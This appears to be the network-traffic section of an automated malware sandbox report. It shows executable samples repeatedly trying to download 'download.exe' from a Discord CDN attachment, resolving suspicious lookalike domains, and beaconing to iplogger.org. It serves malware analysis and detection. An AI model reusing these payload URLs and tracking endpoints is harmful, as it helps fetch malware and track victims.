                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=5Tu3uSzFe_u0ql0piOyslmrRnqNvTgImx7mYbrHzERM-1730889748-1.0.1.1-mDDRXC_IxpTHAGZzXa68GESHc722eS8QWd9pk.rjLyPslvSzbU.UQHwGiabTH05m49IucHekGthYQO0.uwetcQ; path=/; expires=Wed, 06-Nov-24 11:12:28 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HvH15XIW50MncON%2BE%2BoOk0t%2BNJ4RteE%2BJ7kwuwCNOvQ1WTSjNDYT3DSrW3h1dsbyB66iA1y38eQhCHQiMzs4zCR8WFuh1LHSLfX390qcxSAWWlXAYdwCIh8c4oy7ILhbIBW3Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=VC6xmoDjkAC.6mP3GLAb4W87a5eXVYvtkvkAjfSCse8-1730889748372-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a1f3da193f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:33 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=rBRCiUY6l07k.HQx_rtAbpTrZWNBot5AI43xA44ce.o-1730889753-1.0.1.1-jXwY7mGBdn45yvqrFuzlBx1YTyDrX8zqrrD3X7ODsZOSJRYb3Mdm0Ska96sASwbhiM8r2k2lI8I2F90lwNJUhQ; path=/; expires=Wed, 06-Nov-24 11:12:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bs8l5SwAnXxId8CodQgC3sx7Wr2XsFe8s5Rzcnl7bKXfM7MDY455H7MwOhnGycubHKMsQb9DBvYT%2Fpe1wLDwDaGFrQ25%2FSkGTG9TnftDPV1OWRTMV2ITKywPszryunisOMEznw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Z00mNpjfgmLso53PE7qGfCJ9FgaqUdTWHibyWygE.kY-1730889753442-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a3eee6793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:38 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=D5EKLujdQHWvzu7MfC9Q5BaQArLxNZ.jJiz4jb.OZXU-1730889758-1.0.1.1-eW4bcWJqHdZDwxM2B9lpVC6e517CjPTxb1e.6G7nWLxsUZNrXbBXEkwSi58AzdnD940SA9xr3uNsHiENZQsE8A; path=/; expires=Wed, 06-Nov-24 11:12:38 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbGzJFNAIW0C%2BvpUqz32FxAcODPgnEMo7ITDAoFYxAOPGuTy%2B39P9OljQnE9cM6JmGKdVGv9sb7jjPpBK2F4VOeWhqRdlE1vcXYR7WoSuk5gHUSx6Z6fXlcBwfOXf3tu8MFjQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=c50BGulxy5FyKL80gt6gfXJjMjAOz5WyiXjtW8ifqRw-1730889758523-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a5e8b6a93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:43 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=hE2M4OAM7OT_gonlFyy4PMdkYEzE_WrEpLbuqfaqhTk-1730889763-1.0.1.1-hLN2XRmnrznECiQPmG18c81_QjWdsUyq85_Vy6yh7anM0GCSWqFHnDPuLD0LsEH2rPGoyO0Yo3AtlwqV3Q6qcw; path=/; expires=Wed, 06-Nov-24 11:12:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nsob%2F%2BCra0tIUouovdlsNYEyM4%2BRxPOTbKsISD4EPVVkqDFY8jbhMxruwDUuygfPxJ23QFWWo7FAaebghxmcTECHPwQ226Ge3IzstRH9ZptwJrAKMR00Hy7gyZsNQNpBodlsZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=QY5roHK7TFF3lAdpS4reGA.0.SnOYqggmgr.b4BF.6o-1730889763614-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a7e5f6293f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:48 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=Fcp34o96LqWky4G4wxaFmj5Ttj7rtdiCnBR5WchDT_o-1730889768-1.0.1.1-S76vJsw9MGwnrgiJTWhw0g9QPylDiBtW1b7oAOyDWL5oNeKZitedA2Nv96hj7VuerwFScN9whpT_ivwbbQCXwQ; path=/; expires=Wed, 06-Nov-24 11:12:48 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rooIBva9YSqukwaoocHxsN436izV0P2XGAmFYm6zF7oJrr7xxJeLMCE7x7XmVRD4TepHZ9a8lZla%2FTxaQwGQbh33t1XBwAsyFBfmcPlWXisVVbdsA4f9WN7ZuuDHuNwDVSderQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Kyr9QXxPnN5TTJjQ33hn.qCMpC.efVzMjbiC.CwsNLU-1730889768689-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47a9e2af793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:53 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=550zinMeF6.AdbWX4rd2SWmu26zJZzC3fXNcTRXrL_E-1730889773-1.0.1.1-FtSMJyI2FEvmg_EO_vRohI_ck9QoejnHbQMtZBXeqPwMpw6kKI8uGfnWg5wnYaUWrQzAfRd.LDaIjN17FtuIjA; path=/; expires=Wed, 06-Nov-24 11:12:53 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnnN9H7ZIjbDNvMnJi%2FxNLGM%2BPiasMWf07wfhJQf7U2G2BnJFswjNdY27OA2TTckzYGfgw3kF4WGb4lT%2B6xL77Yk5WLEHF5wujU3h2jDFUsCxovsRDJtzSdL0UhehA2VQORPuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Wr1nSp.1d9H7.MiRRzTdYBzIqNrjOnWljRW8i2odEu0-1730889773756-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47abdee0e93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:58 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=OFCQc6Zb1vm_yBXfh4poy.qsFzE4RQEzu_tCzuZwu5A-1730889778-1.0.1.1-GXioKzxNQylm4RkGkwGaiZCSYDEsQQLP1Y8FQizUtfcfUOMdCv6PjkC0a3ygdMCdLtIv224Y2tCBzDYpdhj8cQ; path=/; expires=Wed, 06-Nov-24 11:12:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJik8%2FfsVkDby%2F79mrC3YjJlJ3u9HS4h9Ab7FcKHFu6biawReCZ9QvZNuvPs5ldACH4ogZ7vI9OHMtgIn1QfepV2n6o39rqXv9y68Q1QhOivRfHLy55RoWdjSH9lJjHFlCQ0xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=jBUTTd5Ks3tVDpyL6hoI.HfwwESt90Tn2KesRdV7rsM-1730889778815-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47add898093f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:03 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=4ZkX4p_b0X_YZVNp1cQA2SKbgiwFJ8mBWz3G_sCRraw-1730889783-1.0.1.1-JTI0JM6JTNBPiJ7WbT6LGM5EWVdyxj_FZFBhe7O5B0G4FEzCdjUsajOdgA3vuq8Btikd4SC6WA21FmoJ1am3og; path=/; expires=Wed, 06-Nov-24 11:13:03 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBl8jMFWINaYTDBgNKg%2BWpRyVoYySlLhjK7%2Ba%2F3wFW55ol%2Bi%2BHKxdZbokkRZSBAibbVeiwo9Fl9Hw5BZQu%2Bz2QKurolTqOkN5Jp9B1wFXNlKc8E1s171W8rqbUz94mOMEfoGRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=tv1GcPsadOwqqJRwTGY0p1IWrDuftaGA3kMC52HNS_M-1730889783885-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47afd2d4d93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:08 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=KdT9X_ztG.W2bLFx4uaj59SvoFohQXjY_foDf7LzFr8-1730889788-1.0.1.1-x9fl2qbmRTaRMshX76LVYjEkChfepcOmTXh8CbMcHvwfKnTAQDAlJtTY97Y_CZyssRc1M5kSiYQNuPB_a_alYg; path=/; expires=Wed, 06-Nov-24 11:13:08 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lbmBduZuzAgXUOzyzXCmyg3kdbk7r3DZTSUyZ6ISn%2ByAP1Pdy0IEDSzT%2FJ8aHWIf9a6J%2BDEzIktfaZ%2BgQ19ETOoy%2FWWTq%2Bhtbobw8V7TbkOk60u%2BGR2v2y5AP4B6pF1r%2B7XG1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=b3Mg0O8IYxWMOX5IpMoRhkJhZ2FASeglwU4BbBIZXjY-1730889788975-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b1cda8393f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:14 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HnV5_8qdJxJlscvG1aPocuv.yWhwZ8o6FR_tjArhMEw-1730889794-1.0.1.1-_yiZ6kPA2ypR.XKlud_3uES16SEppij8OKuOlEjaknU9uy6x9uKhCjzT5DpgpHbNgNC0p4xhdWV5loqF_G607Q; path=/; expires=Wed, 06-Nov-24 11:13:14 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FolfGHcSabJ0fc275lCuf35GQT7cCKArETaKNGoVqYWk6oiQaC1T3p9C22A56p7S4YsaHb%2BXtWHOkRzo5x2zcrmdvALj2WMIIyGDaGbBc4oFcOKLBRtnjHk4Y4ns0W80hdyUQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=sQrgvyVPRlppJKdVbeqLXNBeHqgj3ILV8dK7UFP2AW4-1730889794055-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b3cadee93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:19 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=3QRHv1i69xM6M1s5ZdQG7U_BDMc7G52gpTdbfyhedV8-1730889799-1.0.1.1-RV2dKn1fBa3InlHF4S8aT5AfIGUz1wp8txI8HRRwUMBOGcKlh5rMfj1T7NN5biIU.b3ZdYSaOngaAlzp1vCwmg; path=/; expires=Wed, 06-Nov-24 11:13:19 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLrVxrtCgAb45Y%2FG9uyoof1vtEM1e3KyWM5hrl2JDxEXHOluVm%2BAhBK4QRwq%2BeKgOeciqu8rzJM227CHaab4iVNe%2FY9ZBlQzhCEaQAjy0ZyJrzEwOuqNPr%2FDjSDB4NKH35cNpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=GH6rMB5aEt2WxAWSN9wmNwx6Y7Uesyeg_MrqXy0usKA-1730889799174-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b5c687e93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:24 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=LGmxnY2PC4O.YpBVaI8_aDfb09K2CbFdN5CHNLQqck8-1730889804-1.0.1.1-AB.qmIy7dn_GytsY9.t8tQIrJJWvgcLNdrWEjpMr6RHICtrpfLnrxK10ZsYNyKKrQUvrTPUfilAv32Ncep91yQ; path=/; expires=Wed, 06-Nov-24 11:13:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCgMnVwug44S80TDys9jgkkXRZL6VGzYTjmbuxa6sZvc3%2FyTioZ6xxjouzVBQZkUOMYvzAF5Y9xMEmdpmA5XzKFO%2FuTTcBg%2BkigNMu%2Fi5LbGu1%2B30Kv6G%2FdISzWwdwlzzJPU3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=J0ox_5zVq6J4sTvGfkmmW5o3mEuDvnRPO3ZBGlRzMLw-1730889804263-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b7c6e8193f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:29 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=oK.rRzcEwqpiyYW56MVpUeXhwLzXUgsDuV0u0sudXvs-1730889809-1.0.1.1-BIvF7FPc9ZaQXRhkBuPnCLFdYeNwmd8BcUUIk1QquH.H7l_8eHXfW0UzVI_sAnpTQwptzMtYky_af3hL_DwRxQ; path=/; expires=Wed, 06-Nov-24 11:13:29 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=15jssAz8sGSEOVVpD84tGRdJ1SDu4YSrSpYEvqcxU8J8TGuSo5pFtSD7DrReU8bRH889ZLN75wcCZv%2BPi0WFnVFYOCycKfaDnWNZcMGMBlcWJ5plid59qlLFFrv0IbeXeTw20g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=91eKZaeTLffbfLZ7a7SAfMz29sprxUIxC2r2wPpZSYE-1730889809385-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47b9c3b4993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:43:34 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=r9K.h4Ki6frjXzkEKGJBZ66FaGnz2pltXz_kISZMyXI-1730889814-1.0.1.1-TzNP71DjVf33d3gB4ly12ZasI8ZerW9Fn_IRZR42c_GSisPq6H7AxRlxnyc3xJOjYW8rOAtRUU6EgsbOV.gY6w; path=/; expires=Wed, 06-Nov-24 11:13:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLlOjZRy%2F2KbONNkFhfTVuYF8qLROWS%2BrmlAG27cm91NPx09fyRP44Zso9ZIIHvzlqdJC0nkWTyJtjq635XBVHpc4C5WgREGTrxGIx%2FeRWS%2F0oYafgkU6OmtkeN%2Ba7wlH18zOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=cpmO48xr2CHbdqti9KMGMynebPDnJ3kuFbc96JYJ8HU-1730889814466-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47bbc490593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  DNS
                  all-mobile-pa1ments.com.mx
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  all-mobile-pa1ments.com.mx
                  IN A
                  Response
                • flag-us
                  DNS
                  buy-fantasy-football.com.sg
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  buy-fantasy-football.com.sg
                  IN A
                  Response
                • flag-us
                  DNS
                  buy-fantasy-gxmes.com.sg
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  buy-fantasy-gxmes.com.sg
                  IN A
                  Response
                • flag-us
                  DNS
                  topniemannpickshop.cc
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  topniemannpickshop.cc
                  IN A
                  Response
                • flag-us
                  DNS
                  iplogger.org
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  iplogger.org
                  IN A
                  Response
                  iplogger.org
                  IN A
                  104.26.3.46
                  iplogger.org
                  IN A
                  172.67.74.161
                  iplogger.org
                  IN A
                  104.26.2.46
                • flag-us
                  GET
                  https://iplogger.org/143up7
                  Mon1631358b82299bd8.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /143up7 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                  Host: iplogger.org
                  Cache-Control: no-cache
                  Response
                  HTTP/1.1 403 Forbidden
                  Date: Wed, 06 Nov 2024 10:41:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 8092
                  Connection: close
                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                  Cross-Origin-Embedder-Policy: require-corp
                  Cross-Origin-Opener-Policy: same-origin
                  Cross-Origin-Resource-Policy: same-origin
                  Origin-Agent-Cluster: ?1
                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                  Referrer-Policy: same-origin
                  X-Content-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  cf-mitigated: challenge
                  cf-chl-out: 32CcSPp0FY4lWtCeu2xYrsBg56MdOrvVbTZIMW9FeXAI+oI4I3QadEucP4UE1MnoYWmGbNwJH58CWf3w8VCTWhHbTf7ibQIjzwmfPwo9NzHtn8Kc7Iy/UfsjuoVTGZUcGTbvey8sNGpPsCgVWruhSg==$o53EBoPry58zunU4+W7bjA==
                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVsipYEkWnWQ493cqn6cqCe3ziyaCbdLcJ%2BqE%2BNdMyfZB%2BWLweCBu6n2B4SGEjlWTsSYStL%2FEbKC4t3un5onw%2FK%2F3WmmpsL5rEPPD3Qpu6LqwqEOg9Vop9SE3qcOVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8de4787a69e0948e-LHR
                  server-timing: cfL4;desc="?proto=TCP&rtt=42337&sent=6&recv=7&lost=0&retrans=1&sent_bytes=3186&recv_bytes=514&delivery_rate=88868&cwnd=252&unsent_bytes=0&cid=7e3532698f612d15&ts=2903&x=0"
                • flag-us
                  GET
                  https://iplogger.org/1Brhn7
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  104.26.3.46:443
                  Request
                  GET /1Brhn7 HTTP/1.1
                  User-Agent: m1122
                  Host: iplogger.org
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 200 OK
                  Date: Wed, 06 Nov 2024 10:41:18 GMT
                  Content-Type: image/png
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: 312752312328304940=3; expires=Thu, 06 Nov 2025 10:41:18 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
